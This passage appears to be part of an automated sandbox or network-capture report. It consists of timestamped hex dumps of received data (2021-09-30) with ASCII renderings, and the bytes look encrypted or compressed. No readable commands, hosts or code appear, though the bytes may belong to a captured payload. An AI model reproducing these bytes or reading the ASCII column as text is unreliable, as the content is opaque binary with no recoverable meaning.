ba ef a2 26 f6 36 29 7c c6 3f 14 5d c6 2e 02 f9 dd 42 94 ab 40 d8 1b 39 56 49 0e 06 d9 7e 2c 98 84 9d 37 7e 7c d1 78 18 24 5d 14 b0 29 86 d9 cf 5a 80 28 a1 1c cf 44 6e a9 da f1 ba 2d 49 47 8d 48 c2 e9 35 52
                                                                  Data Ascii: (dI<aW$zta4jh9(5?,(]{3u'o[$MYwZ;$UL_Tdti,L]Bb+=,p>i.M_#f+6z`-2*2fRK^+/3g@:,&6)|?].B@9VI~,7~|x$])Z(Dn-IGH5R
                                                                  2021-09-30 21:52:28 UTC1664INData Raw: 17 30 ee 0a 06 3c 39 bb cc ed a7 5f 20 39 75 45 64 a9 a7 08 2e f7 ec c6 14 40 4e 25 da 21 50 37 9b 95 63 a5 51 74 4f 7b b0 2f e9 c4 99 d1 ac 2a 53 db 2d 57 1e 8b c8 aa 7c 88 84 38 44 f8 c2 9d dc 85 3a 88 c4 f8 17 a9 98 38 ae df 7c 0a 42 3f 9c 0b 6b bd d3 bb 2f a8 91 aa 16 fd e7 bf 63 7f 4e 91 e0 40 65 39 92 a2 77 d3 dc 31 d7 73 2c c9 f9 b7 15 3b 28 f1 5c 4c ef 44 9b 71 1d da 1f 56 69 9d 5d 1b eb 6e 25 69 e6 99 df d3 d0 58 2e 1a fd 6b 39 41 53 74 5c c4 94 02 e1 ef a3 c9 7b 8d e7 ef 4e 3d b3 84 07 5e 78 c6 5e db a0 39 54 a7 15 d3 4a 67 3f ae 5a 48 f4 a9 17 c4 1d c7 04 c6 f1 64 d1 57 fb 6a ab 58 2a 29 64 be 4b 7a e0 92 15 2e af b6 69 d1 4b 00 3e 7a c1 cd e2 6d 79 61 80 ac af 7c 69 50 ce 74 69 d9 d8 c6 22 37 e8 13 df 60 fb c0 ac f7 7f 1f 41 8f 2b 4e 42 f3 63
                                                                  Data Ascii: 0<9_ 9uEd.@N%!P7cQtO{/*S-W|8D:8|B?k/cN@e9w1s,;(\LDqVi]n%iX.k9ASt\{N=^x^9TJg?ZHdWjX*)dKz.iK>zmya|iPti"7`A+NBc
                                                                  2021-09-30 21:52:28 UTC1680INData Raw: e3 f6 ab d3 fa 00 e6 77 1f d4 8f ff 0f 4a c2 22 35 2f 7a 27 9e eb fb f7 bc e5 27 df e7 2b be 09 8a 10 ab 20 4e 38 16 a0 10 a7 50 f3 e9 7f 75 5b c3 06 74 00 bd 24 f1 84 c2 54 43 f9 46 58 0a 01 4a c4 04 2c 47 11 49 5b 93 30 cb 53 7a 16 1c 87 46 a8 7b 6f a0 4e ab 99 f7 02 65 28 10 57 93 b2 6f 0a ae d6 47 3f 8b bf 7b 62 ae 88 a3 cb d7 7d c9 80 3f 25 dc 37 66 8e 29 32 99 c5 8e fb 57 93 ad 55 c6 b6 e7 b8 65 a8 50 6e 64 48 92 49 d6 1f e9 73 9b 24 06 72 9f c9 1f 72 1d f5 67 61 c9 51 7a a7 2f ad 4b aa 67 19 3d f3 c4 2d 6d bc a5 38 de 7d 6d cb 94 42 e4 e4 d9 4a 46 59 fb e2 e3 48 91 00 a7 bc 81 19 99 88 df 29 6e 53 94 37 6a 46 82 0f a0 c9 d4 77 d5 b3 5a d5 9f 49 8a 7a ac 33 14 18 f7 5f 30 cf e4 f9 6c 81 82 5b 26 e9 ec a8 c4 a1 6a 2a 4d 9c 2f 48 52 af 1b dd 7b 7d ed
                                                                  Data Ascii: wJ"5/z''+ N8Pu[t$TCFXJ,GI[0SzF{oNe(WoG?{b}?%7f)2WUePndHIs$rrgaQz/Kg=-m8}mBJFYH)nS7jFwZIz3_0l[&j*M/HR{}
                                                                  2021-09-30 21:52:28 UTC1696INData Raw: 0f a4 7a 18 82 43 d8 93 a8 6d 94 76 a9 46 2e 01 15 3c 0b 2f f5 f8 6d e0 ae 11 84 0f d2 8d 1b ca 00 f1 66 f0 da 56 16 5d ed c6 5f 95 24 2e 15 bd 0f 1a 9c fc 7e a8 f4 68 80 82 93 30 0c 74 4b e2 c7 03 ea cf 2e 1c de e3 23 f0 93 7c 0e 52 e0 80 9f 9d c5 9e 79 3e c2 a0 72 2a d2 3b 2f 56 ca a0 41 1e 50 5d 35 82 63 18 58 1d 85 99 eb 3c 18 e7 db c4 67 90 1e 66 2c 5a 79 e9 3b f5 cd 7d 7e 3e 43 5c e1 61 ea 6d 8c 2d 70 b9 ee e9 1b 47 ce 55 e7 81 f2 08 37 bc d0 51 97 19 cc 2c 27 db e6 dc 38 5d 6d ba a7 1b a5 fe 3f a6 08 94 6e 54 de 09 3e 86 79 dc e9 7a 6f df 1a e0 30 e5 41 66 16 ac 2f 31 94 86 6d 8a f6 63 cb a7 ae e6 89 e9 00 32 b8 01 69 50 01 27 09 61 01 e2 fc 18 54 b4 46 45 01 4e 9d 8b 05 d7 a3 2b 2f 8a 23 30 3b 14 10 bc 22 75 f2 b4 93 06 fb 80 7e 24 51 e3 6f af 58
                                                                  Data Ascii: zCmvF.</mfV]_$.~h0tK.#|Ry>r*;/VAP]5cX<gf,Zy;}~>C\am-pGU7Q,'8]m?nT>yzo0Af/1mc2iP'aTFEN+/#0;"u~$QoX
                                                                  2021-09-30 21:52:28 UTC1712INData Raw: fa a7 6b 47 f5 7d 4f e4 a4 4e ea e5 9f 1d 1d c9 10 a0 7c f8 b9 9b 3b 1b 27 e9 74 19 2d d5 15 31 fa 96 66 96 de ae 2a 74 da 68 17 fe af a1 e8 3b 82 56 3d ed fa 7a 8f b4 09 89 14 da 91 f4 74 bf fd d0 4d e1 22 e1 09 68 bb b9 0c 78 07 2a 65 78 da 20 e6 af 07 f7 23 0b a7 09 94 ed 2a d2 5e 76 4b f1 b1 88 d1 93 a6 cd 88 fe 15 4c 92 0f 9a eb d9 87 9e a1 9a b6 ef f8 0f f0 41 56 9b a9 81 6a b0 62 50 0e 53 d0 b7 19 02 0c 6c d1 42 03 0d e1 cf 72 00 a2 65 01 4e 49 9e f3 a0 46 68 b5 48 0e 10 25 75 47 a5 e2 7c 21 32 04 7f e7 bb ed b1 94 82 88 0e 21 7d d9 ee a9 ca 7e d6 26 06 d0 8a 04 0c 4a 5b b4 e8 af 6e a7 83 c8 1b 0a 68 ad b8 b8 5b 19 b4 a2 c2 13 67 f7 02 2a ed b7 87 53 85 2a 70 3f db de 70 48 69 18 6c b6 da c3 93 6a f1 20 41 32 c0 d1 4a 01 0b 2d 03 43 0c 1f 5f 2f 65
                                                                  Data Ascii: kG}ON|;'t-1f*th;V=ztM"hx*ex #*^vKLAVjbPSlBreNIFhH%uG|!2!}~&J[nh[g*S*p?pHilj A2J-C_/e
                                                                  2021-09-30 21:52:28 UTC1728INData Raw: e6 66 84 a5 95 07 49 56 f6 be d4 9b c4 b2 a2 eb 17 9a 9a 7b e1 7a f2 9a 00 3e db da a6 52 fd 09 56 54 01 f3 af 16 e6 63 a1 eb 4e f7 4b f7 a5 c6 44 8d 87 f0 ac 11 c3 bf 80 90 b7 1d 43 56 b0 e3 68 1a de f7 ab f7 2a 51 05 f0 09 fc 1a ae b4 ae 94 fe a4 3b c3 43 cb 8a 06 b3 bd e6 57 e0 84 63 20 02 8a 9d 5b 58 f4 57 6c 5c b4 d5 38 2d ab cd 5a 81 1b cf 96 5b 4e 3b fb bd 01 ae 33 80 33 06 6b 66 36 32 95 df 51 da e6 a7 c6 34 9f 19 0c 6a bd fb 1e 6c c4 82 c9 37 ff df 6f 59 02 87 46 61 b0 19 db e8 94 1a 0d 49 e3 93 ad ea 1f db fe c5 a6 dc 0e b3 82 67 66 7d 7a bc 8a e3 2e f9 01 7b 49 2f 49 67 48 16 ed 2b bf 45 a7 3d c5 95 7a f7 21 9b 80 fb db b3 49 ba 1d 2b c2 e2 27 5b 6d 77 b4 e3 21 7a ba ca cc 8b a6 31 06 56 dd 2d ef 02 81 a2 35 65 78 71 35 b1 23 ec 2e 46 0f 92 a6
                                                                  Data Ascii: fIV{z>RVTcNKDCVh*Q;CWc [XWl\8-Z[N;33kf62Q4jl7oYFaIgf}z.{I/IgH+E=z!I+'[mw!z1V-5exq5#.F
                                                                  2021-09-30 21:52:28 UTC1744INData Raw: 04 30 65 c1 dd 7f 53 7b 8c f9 96 17 c7 23 f0 47 78 3c 29 c7 52 86 be 2f f4 12 00 23 02 7f da ce 37 21 53 2e 0d 34 d6 2c 7e 99 c1 88 98 03 16 22 e2 72 48 01 95 41 76 41 f6 cd 8d 5e 26 76 55 fa 45 ef e5 b8 62 24 90 52 4d 96 f2 88 e2 4c 8b 39 06 37 f1 44 6d f8 97 0e 44 3b 37 f6 f0 73 1d a8 9e 3a c4 10 67 00 63 f4 1f 19 59 16 de 17 6f 28 3a bd ab 6f d4 7e ec db 18 26 7a de 57 52 df bc 23 d3 cf a5 7b eb a8 07 be f4 de 2c 57 ad f4 cf a5 f0 d9 63 73 80 73 f6 15 c4 fc ff b2 02 1d f4 c3 7b 87 44 25 57 47 15 c2 35 6e cc 41 6f 9d c1 b6 cb 6c 5f ca 77 36 34 09 0a 75 43 9e 00 be 0d ed 6f c2 25 7b 5a 97 01 c2 71 4c 9c 6c 62 4c f8 30 54 11 60 36 7b d6 6c 81 21 5e e5 f4 9a 98 b4 e9 de fa fa 65 0d 9c 0e 02 11 67 68 9d 0f 15 fa 55 e0 02 ef 42 17 58 70 c1 30 6b 24 d7 6d 80
                                                                  Data Ascii: 0eS{#Gx<)R/#7!S.4,~"rHAvA^&vUEb$RML97DmD;7s:gcYo(:o~&zWR#{,Wcss{D%WG5nAol_w64uCo%{ZqLlbL0T`6{l!^eghUBXp0k$m
                                                                  2021-09-30 21:52:28 UTC1760INData Raw: f4 a3 07 58 d7 3f 0c a0 1f 7f 6b c0 2b c8 36 e9 11 46 6a f8 53 45 9f ff 07 56 87 c4 10 0a fb e5 f5 81 88 a4 9a d4 56 a6 df 24 06 6d e5 f9 44 9f fe d1 18 2d cb 16 ce 2c ba 69 93 fa 60 58 18 00 d9 ba 63 14 6e 17 32 44 62 63 e0 48 52 44 00 57 30 c8 cf b7 5b 35 87 4d 10 f4 58 a2 52 a0 55 84 91 0e 6d a2 53 df 88 03 7c bd f0 c6 66 67 53 47 bd a5 f0 1c 3d be ab dc 6a 32 7b 2d ac 00 2c 48 22 43 30 3d b5 59 b0 47 a3 41 39 dd 4e a4 bf d1 75 67 90 29 5c f9 97 c1 34 ea e5 1d 66 45 fa a2 53 3a 1b 81 81 c3 0e 0d 21 bd c1 58 ee 25 50 4e 87 45 f5 44 93 79 b9 b0 8e 61 68 7a ce 85 08 8f e1 15 fb b8 d4 26 24 0f e2 a2 e1 05 76 35 3b 1b bd 26 15 7d 0a 8c b2 8c 29 ac e5 82 ce 29 26 ad 57 dd 50 46 f9 b7 80 ff 73 3f 6b e4 47 b5 8d a8 3e c9 ac 34 7e 32 55 41 36 61 2a 1d fc be 8b
                                                                  Data Ascii: X?k+6FjSEVV$mD-,i`Xcn2DbcHRDW0[5MXRUmS|fgSG=j2{-,H"C0=YGA9Nug)\4fES:!X%PNEDyahz&$v5;&}))&WPFs?kG>4~2UA6a*
                                                                  2021-09-30 21:52:28 UTC1776INData Raw: 04 b2 3e 98 74 ee 1f f0 5f b9 f2 ef 75 b8 83 b6 4b f1 6d e2 7d 62 13 09 79 ec 30 5f f7 d5 63 0f 03 58 37 94 7d 44 c1 c8 13 24 22 f6 82 38 d3 39 be b4 11 19 ef 72 50 b2 3c 70 49 4d c5 6b 45 a1 ef bc 66 3e ad 2a 07 bd 5b a6 1b bc 6e 7d 8e 7a d1 3a b9 73 0f 7e bf d9 b2 44 b0 58 b1 70 1d 96 98 f2 4a 67 d5 c6 c9 68 84 64 09 93 61 45 a0 3a 00 58 5e 1d 38 86 d0 4c 10 7c 87 f2 96 ea 0a cd b0 cd 39 e1 7c b6 eb 0e 2b 7c ba b5 ab 62 87 1d 5d d8 5d e8 90 39 67 44 9c 6e a1 ef b2 38 30 d5 cc 3d 03 ac 34 32 da a8 bc 8a cb 65 72 d7 fc fc 22 5d ff fb c5 22 5d ce 98 9f c6 04 c4 71 8c 6a 49 97 26 3b 43 a6 ac 74 87 d8 a9 bc ee a5 af ff d0 7a 04 6f 5b d7 40 cf f0 78 af 6a d6 f0 9d 5a f5 4a 66 16 f9 7c f5 82 a2 be d7 30 c2 41 9f 52 16 2d d4 39 87 d7 0f bd f2 e3 aa 63 1c 0c 05
                                                                  Data Ascii: >t_uKm}by0_cX7}D$"89rP<pIMkEf>*[n}z:s~DXpJghdaE:X^8L|9|+|b]]9gDn80=42er"]"]qjI&;Ctzo[@xjZJf|0AR-9c
                                                                  2021-09-30 21:52:28 UTC1792INData Raw: 5d a7 5b 72 3a ce 30 a2 ba a2 38 19 37 59 06 6a d5 6c 22 b5 f1 c0 2a f3 4d f8 f8 0a 66 c6 87 2b 58 df 3a 33 9c 8a 78 9f 37 1c 10 9c 1e 8d 87 4a 18 6d 84 2d 98 2a 00 4f 23 1c af fb bf 97 34 42 63 4e 0d f0 aa 62 33 53 43 92 a2 46 65 dc 83 ff cb 7e 65 51 79 19 b7 08 06 b3 41 12 d6 21 7b e0 01 ff c5 5b 2a 96 07 0e be 2f e5 b7 9a 2f 15 92 e9 65 80 69 3c b4 82 c2 39 30 c5 ff b7 9b 8f eb 24 a4 73 b7 68 b8 8a 38 df e6 ec 96 af 55 b8 d6 1c e6 2e f6 6e 80 90 72 b3 31 3f 4c a0 f1 f7 00 28 33 0c 23 a1 57 cf 05 e2 d5 1a 93 34 fb f1 a1 f7 e5 60 ab 74 32 4f 76 c1 77 6f 64 27 bf 44 9d d4 19 ee 2b 89 43 2a ae 5d 2c 12 d0 ea 5a 4f 7d 42 97 cb 27 cc 19 86 62 93 04 98 c5 31 25 3a 71 7a 84 6e ad 36 7d 62 30 7e ba 5d 32 4d 73 6f d2 f4 f6 d0 0e 43 74 df 2a 87 76 2b 66 eb 04 d9
                                                                  Data Ascii: ][r:087Yjl"*Mf+X:3x7Jm-*O#4BcNb3SCFe~eQyA!{[*//ei<90$sh8U.nr1?L(3#W4`t2Ovwod'D+C*],ZO}B'b1%:qzn6}b0~]2MsoCt*v+f
                                                                  2021-09-30 21:52:28 UTC1808INData Raw: 86 49 88 ec df f3 3b b8 ff 09 28 4e 5a f8 3a 1d c1 99 12 68 64 65 8c 64 1f af ea 3c d1 62 4d f8 0d f0 a0 3b e7 8d c4 a4 63 b5 bb 65 cc 7e d1 0b c9 04 e4 56 9c 55 4d 77 71 11 79 9e c5 d2 b3 e4 39 f1 f6 7d 67 8c 37 dc 7d c8 4c 37 04 e3 1c 85 ec 0c cb c0 99 e9 f9 9f f6 1a f8 9a 43 a8 84 b0 ea bd ad 59 47 e6 60 34 52 cc 95 6f fc 56 3e 6d 9c ad 37 21 a0 8e 32 7e 72 1e d8 fb 71 6a 6e e7 b2 b4 55 77 9f a2 54 e6 28 29 7e 5d c4 dc 9b d9 af 7e 7c aa bc 06 00 e1 99 f9 25 58 b4 52 69 83 af 2d da 2c a8 ec c6 5d a2 b4 de c9 74 b1 f7 6b 89 0c 24 28 a6 e1 43 d4 8d 2e 6e 2e 3d b9 c5 a2 80 dc 77 cb 94 7d 96 7d c5 58 de 22 88 04 c5 aa b3 d9 51 9f f8 e9 59 dd 61 92 c9 2e 32 37 66 7b d4 91 35 09 77 0e 8c 45 91 a5 38 26 ef e3 c6 fa 9d b2 a2 0e 11 82 30 6d 5a 45 29 ef 35 99 03
                                                                  Data Ascii: I;(NZ:hded<bM;ce~VUMwqy9}g7}L7CYG`4RoV>m7!2~rqjnUwT()~]~|%XRi-,]tk$(C.n.=w}}X"QYa.27f{5wE8&0mZE)5
                                                                  2021-09-30 21:52:28 UTC1824INData Raw: 77 37 2e f9 ad 98 ca 8b 11 bd 5c c4 d6 bc 11 a7 f5 13 d1 a7 67 b0 9d 13 54 97 45 1a fb a3 ef c7 e1 4b 83 a9 1a 7a 81 b1 00 20 05 dd 39 f2 6d ac 63 8f 09 c3 ab 21 a5 fa 99 fb 9d df 99 7f 7e d5 fc 22 7c 43 af c4 5e ad 74 0e 9d b1 fa a9 e0 5b dd 36 f9 4a 7b 89 89 96 bf 42 26 0e 88 90 b9 64 9e 21 c6 27 f8 06 b3 87 73 36 e1 33 1c 7a 63 f1 a5 fe 7f 53 2f 0f ba ec 60 5c da 72 3c 6e e3 d8 97 a9 51 ec 11 39 dd 6d a4 ee 1a cc d4 6c 47 8e 1b 8d 38 0f 6d 8f f5 7b c7 28 9d fb 3e 50 13 5d 38 a7 e7 b2 d4 af 36 54 55 da d4 04 1a 88 ed 08 79 de 2d d6 e7 6c 6d cb c8 5d cd 70 a0 4d 16 98 14 3c 84 00 7e 93 ad 87 43 d4 dc f3 09 ba 27 34 61 3b 7d 6a b8 80 10 75 43 ab 9a 35 e1 e7 5b 8c 79 04 1e 59 b0 fa 82 8f 5c dc 76 ef 05 68 94 76 eb 14 0e 65 2a b3 03 d3 e3 2e 7e cb 20 24 9e
                                                                  Data Ascii: w7.\gTEKz 9mc!~"|C^t[6J{B&d!'s63zcS/`\r<nQ9mlG8m{(>P]86TUy-lm]pM<~C'4a;}juC5[yY\vhve*.~ $
                                                                  2021-09-30 21:52:28 UTC1840INData Raw: 8c 51 53 0f a0 82 7b e4 31 7e 7d 98 e3 07 f8 6d 78 c9 25 2e a9 04 f5 00 d5 52 dc 00 1c 71 79 3e 8b 47 b3 f9 05 2d bf 27 dc 9f 9f fe 9f f1 ed b1 55 d6 3f 02 66 c8 6c d9 d5 0b 57 74 7b 9a 0a be d9 fa 65 cf 2d 81 8f 01 3d 98 78 cf d3 b3 89 69 f3 ab e0 8f c3 3f a8 a2 a3 ac d0 05 9e 88 23 c4 5d 02 65 31 f1 5b 5f b2 27 6b ca 96 de 90 fe 3d f2 6d 9e af e5 8a 7f 60 aa e8 62 03 e1 3d 1c a6 83 e4 c4 04 3b b2 0a ba 0d 7b 33 29 e7 41 57 9b ad ff 0c ad c9 a6 9b 42 37 ef 81 01 fe 0f ee 39 05 b1 17 28 ac c0 08 f2 3f a3 20 da 33 bf 2a cf 24 6d 5e 1e dd fb 5e a0 0a 23 82 f4 ff 92 64 68 98 2a 52 38 28 7c d4 4a c8 0d 8a af 83 aa 1e 7c 4e 8a 0d 80 f0 c1 c9 8c 10 9f e8 b4 3b fa 91 50 e7 1a 6b b3 66 de d8 6b 89 2c ff 76 63 7e 84 82 f4 41 54 4e 1f 41 3b 2e 48 7d 5c c0 2e 54 87
                                                                  Data Ascii: QS{1~}mx%.Rqy>G-'U?flWt{e-=xi?#]e1[_'k=m`b=;{3)AWB79(? 3*$m^^#dh*R8(|J|N;Pkfk,vc~ATNA;.H}\.T
                                                                  2021-09-30 21:52:28 UTC1856INData Raw: 60 69 fd 28 bc c4 2a b9 e6 6f 64 42 f4 3a 9e 89 de b4 3e f8 cc a9 76 e9 3e f5 73 8a 59 a1 14 df cc 33 f0 bd 91 26 ed c1 1a 83 62 37 1a f6 71 c9 c4 b9 42 8a 63 26 ce 15 e0 88 a5 5d 53 e4 9a 15 cf cf d9 e4 f8 03 1a f8 b2 2c ad 43 c8 36 de 5d dd ce 2e 37 fe b1 c7 4a 45 a7 e2 7f 14 cd 1c 85 49 8a f7 ad 65 61 c3 50 9c 4c d3 4f c3 e5 5b ad b7 ab 0c 53 6c e8 aa 61 2a 6e 5f 73 78 fb e5 4f 6e 1f 09 27 9c 0d d7 51 f3 c7 06 cd 92 27 76 6c 09 cd 01 41 08 be 8a 4d 58 14 46 be 6c fd ba 1f f1 96 92 fa 71 4a a9 19 e1 18 1c 78 a8 63 d5 c2 9d bf e1 15 53 76 1a 88 09 74 27 86 6e e5 5a 0d 99 21 37 36 22 d2 67 fc 57 8d 5d 74 eb 23 cb 94 20 ab 70 f5 2d 8e 95 49 4d 9a 42 e3 53 7f 66 aa ed a4 fd 3c c4 34 7c 19 ff 5d 37 1c de 09 fa 3a 3a 74 0f 5a 3f 03 06 5f 26 ce 55 5d c1 10 85
                                                                  Data Ascii: `i(*odB:>v>sY3&b7qBc&]S,C6].7JEIeaPLO[Sla*n_sxOn'Q'vlAMXFlqJxcSvt'nZ!76"gW]t# p-IMBSf<4|]7::tZ?_&U]
                                                                  2021-09-30 21:52:28 UTC1872INData Raw: b1 7e 86 02 ef 85 52 6a 6b 9f 89 12 09 c6 83 6e 2c 13 d0 9a 11 69 14 8c d6 95 91 62 05 8b 49 a5 78 22 75 9e 28 5d 6c 77 bf e7 d3 3a 65 62 31 5f 9f 27 c6 8c 4a db 6c 62 c1 f2 7a 5f ad 8c 49 6c a2 e2 61 5b 61 fc d8 d1 c4 e0 6d f6 53 1c 8a c1 5f 1f 4f 49 14 6f 4a f4 fd 16 cd 29 03 bd 2e 21 d5 5d 07 e6 5a 87 9e 68 16 28 fe 15 e0 ef 4f 9a ca e6 be a0 71 c4 90 5f 46 43 82 9a 04 02 8d 0e ac 2f 1a 8b 29 23 9c fc 77 d3 6c ca f7 60 69 58 69 b4 ff bf 1a 9d 5b 1d d3 b6 b7 19 1c e4 f1 3f bb be c3 e7 fb cb 6a f9 cd 19 62 f5 15 c2 83 9f 2b 9b 11 26 fb ab 75 13 d7 16 a0 63 56 ff 39 4b 3b 0d 58 27 b3 d5 30 c6 4d 00 0b e4 37 75 e5 9a 31 7d a0 be d8 a5 25 4c 26 4b 7b e8 47 9e ae 43 f2 a7 a2 65 3f bc e6 79 df 04 09 6e 72 83 74 67 69 15 0f 45 f2 d3 04 51 85 31 15 4b 8e fd 42
                                                                  Data Ascii: ~Rjkn,ibIx"u(]lw:eb1_'Jlbz_Ila[amS_OIoJ).!]Zh(Oq_FC/)#wl`iXi[?jb+&ucV9K;X'0M7u1}%L&K{GCe?ynrtgiEQ1KB
                                                                  2021-09-30 21:52:28 UTC1888INData Raw: 1f ae 7f fb cb 02 77 f9 75 90 e8 94 3d 66 05 43 8e ae 1f b5 03 44 da a1 a4 2f c0 ab e9 52 8d 88 e3 ef ae d0 a7 5f 71 6d a2 1a fa a0 73 6a 2c 81 59 58 28 b3 75 f7 0e 35 56 66 4a 9b b9 a9 c4 a6 6f 54 f7 42 87 b0 9b 3e b8 ee b5 e9 eb a3 57 7b 89 ed 2d c3 9d 63 74 45 ac 63 b8 99 6c 23 f0 c8 ee 4e 83 2d 03 18 97 37 65 73 06 90 d4 1f e5 a1 a5 a8 40 5b 3d 5c 26 6e e3 1c aa 2f e0 e2 0a ec 2a b2 e5 e7 60 89 3f 41 83 e3 03 27 36 b2 4f 3a 22 ad 3b 93 4a a2 d3 65 51 59 43 01 bc 2f f6 57 fe fe dc 49 41 de 00 48 2d 99 0e 24 17 28 17 0b 13 e1 8a 30 9a d7 df 7a 82 c3 7d 69 d7 5b 8c 74 72 4c e3 cd d6 76 03 16 91 de c0 30 7c e2 29 cf be b1 ed a1 d0 0e e2 0e 83 7e 8f 71 98 58 6f 3b 35 a1 6f 52 b5 e4 54 fd b1 25 a4 a0 03 77 55 77 ad f6 86 ba 01 ea d9 96 64 63 98 76 08 fa 17
                                                                  Data Ascii: wu=fCD/R_qmsj,YX(u5VfJoTB>W{-ctEcl#N-7es@[=\&n/*`?A'6O:";JeQYC/WIAH-$(0z}i[trLv0|)~qXo;5oRT%wUwdcv
                                                                  2021-09-30 21:52:28 UTC1904INData Raw: 42 29 d9 f1 52 23 09 1c b0 ca 43 22 38 5e 77 47 b8 60 e2 d7 40 b1 74 9a 48 f9 25 64 a6 e2 56 04 ff 89 32 15 d1 4e fb 01 24 f2 26 19 f0 a2 ca 1c 7e 8e 54 3c 7d c3 30 7a 04 d4 58 a5 7a e1 61 66 22 44 fd 56 54 7a 9e 8e fd df a7 16 d6 ca 39 03 14 ce 4b 08 13 69 43 8d e8 81 d5 44 6e 91 3a 32 de a2 82 35 e0 d3 8d 3d cf e2 21 ac 51 44 21 a4 30 37 df 77 67 b0 99 1f 8e 05 9a 76 34 e3 f6 ff 32 5a e8 89 83 31 06 38 4c 57 93 f3 7c be 8f 87 4e 2c 67 21 67 0f ae 7b bd 23 fe 75 70 fb 14 63 f8 16 b1 68 96 da 89 df d1 6d ab 28 ec d2 6b 94 ee c4 82 66 b5 8e 7b a6 4d 5e 93 b0 f6 44 cd bf 9a 72 b2 ac 7d e1 83 77 5f 8d dc 90 a9 ab af 1c 90 a2 2c 34 c3 29 b3 e6 8e c3 85 cf d5 67 62 6e 56 46 55 78 03 23 79 7d 4f ca 4a 70 13 e2 e2 a7 10 7d 95 c9 39 90 4f 96 8f f6 f8 8f 9c 88 b3
                                                                  Data Ascii: B)R#C"8^wG`@tH%dV2N$&~T<}0zXzaf"DVTz9KiCDn:25=!QD!07wgv42Z18LW|N,g!g{#upchm(kf{M^Dr}w_,4)gbnVFUx#y}OJp}9O
                                                                  2021-09-30 21:52:28 UTC1920INData Raw: db 9e a1 6a 08 8c 44 32 4e 12 24 48 c9 83 ec 33 6f 1f e1 a2 51 9a 32 46 f2 3f ad f7 f7 6f b8 33 f7 73 91 8b 0e 29 cc 3b e2 4b ec a3 c7 cc 12 c6 69 cb 01 30 e9 38 34 5c 17 ed 4e 66 56 ad 0d 59 70 ee 57 10 27 f2 bd f6 46 05 17 21 08 93 bb 07 0d 48 e8 6a 94 c1 a4 13 36 6f 77 0e c2 33 0c 04 af 98 8a 54 ad cc af 91 78 99 dd c4 0b d7 c9 58 b0 d8 ae d1 a1 3d fd 8c 06 44 00 16 7f a6 78 8c 6d ab 71 b3 b9 71 e2 c0 64 66 63 de 64 ca d4 5f 42 98 ab 3d 6b e7 9c 4b 33 96 43 c4 ae b8 b0 27 de 6e 1b 4c b4 6a 6b c7 2b c5 09 2c 66 f8 83 c8 9d 54 91 eb f3 7d b4 6f 17 12 32 27 6a d1 69 2e 65 93 41 ca 30 d4 d7 6c ac 35 0a 35 9c 34 5c 99 bf f9 e6 0d ab b6 dc bb a0 aa f3 ba cc a5 7f 90 e1 55 64 fa d5 bf f6 14 14 02 14 f5 b3 be 3c b4 e6 1e b3 6f e0 72 c5 43 6f 32 f5 1a e5 c8 24
                                                                  Data Ascii: jD2N$H3oQ2F?o3s);Ki084\NfVYpW'F!Hj6ow3TxX=Dxmqqdfcd_B=kK3C'nLjk+,fT}o2'ji.eA0l554\Ud<orCo2$
                                                                  2021-09-30 21:52:28 UTC1936INData Raw: ec 32 11 6e 52 69 ee 37 7d 65 fd 1a f6 0c c1 37 85 ed 20 1e b8 5c c4 f2 91 df e1 47 95 b3 b7 64 5f 1f b5 43 f3 3b 86 9c 17 9e a0 ed ed 16 a6 25 b8 fe 37 6b 86 f6 53 88 76 3a dc d6 9f 51 f3 52 30 e1 89 c0 8d 64 f9 0c 54 7c 68 37 41 10 70 8e 5c 6f d2 be 2c 49 41 23 e8 79 af e7 83 3b 0d b6 28 bb 28 d8 9d 12 f2 5e 05 53 a5 8b b6 64 c5 5d ec 5c 6b fd ed 2c 33 0a 54 ea c3 22 5e 75 34 fe c7 8e 64 78 74 00 c9 3b 76 7b cf 16 1b 14 b5 17 14 bf 66 34 db 33 6d 82 17 9c 41 0c b6 a3 43 e6 08 f8 f6 32 f1 5a fc 5b 1f 3c 39 74 56 27 74 57 61 b7 2a 32 1c ee 5b 0a 01 ba 91 19 a1 34 47 79 a8 d7 f5 23 45 99 78 b1 08 2d 15 5a 22 eb a1 71 c4 44 50 2e 13 66 c6 d6 66 b8 11 13 43 ba ef cd e4 fd 29 1a 4d 08 a7 fa 6a 2d 82 b0 f6 d1 0c b7 37 d4 31 21 5a 6d 54 6b d2 81 a4 da ac 11 49
                                                                  Data Ascii: 2nRi7}e7 \Gd_C;%7kSv:QR0dT|h7Ap\o,IA#y;((^Sd]\k,3T"^u4dxt;v{f43mAC2Z[<9tV'tWa*2[4Gy#Ex-Z"qDP.ffC)Mj-71!ZmTkI
                                                                  2021-09-30 21:52:28 UTC1952INData Raw: c2 47 ba d1 e4 5b 9e 74 6f 80 13 4f ee 95 a1 93 48 73 2a 80 31 c9 77 11 16 79 00 7b a3 60 42 dd 40 66 ed f3 9f 0a 0c d0 73 32 c0 ff ca 3b 28 77 68 6c e0 b9 5e 81 61 2e 55 23 88 b2 ab ce ed 75 3c be fd cf 4b a9 75 de 03 f2 40 db 5a 8f 35 47 3a a4 9d 23 1a a9 a6 7f 09 37 d9 bc ed a5 b8 3a 3b ca 3a 1d cb a7 64 18 c7 cf 8d 4d fb 81 bc ca 2f 07 6e dc 43 a1 b2 5a 00 76 5f 8d 7f 92 c5 78 f1 9a 75 c5 68 d8 18 9b b5 95 ac d0 98 5e 46 9a 3e d7 fb 16 8f 90 d2 6f fd 21 07 8a ef 91 72 f2 3f 71 23 04 49 b0 74 db 45 8b 6b 1d 12 08 97 59 5b 6f 8d 2f ec 32 2f b9 fe fc 58 08 30 f3 c3 6e f2 b9 b4 0f 02 c7 25 43 52 35 44 a4 c8 34 f3 64 72 31 75 db 66 94 40 a8 0c 5b 17 8a 1a 23 6a 33 42 4e 0c f6 80 2b 81 b6 cd 2c 2a 3e 01 82 70 35 99 1e bd 9a 40 d9 94 a6 b8 c7 68 6e b6 65 ae
                                                                  Data Ascii: G[toOHs*1wy{`B@fs2;(whl^a.U#u<Ku@Z5G:#7:;:dM/nCZv_xuh^F>o!r?q#ItEkY[o/2/X0n%CR5D4dr1uf@[#j3BN+,*>p5@hne
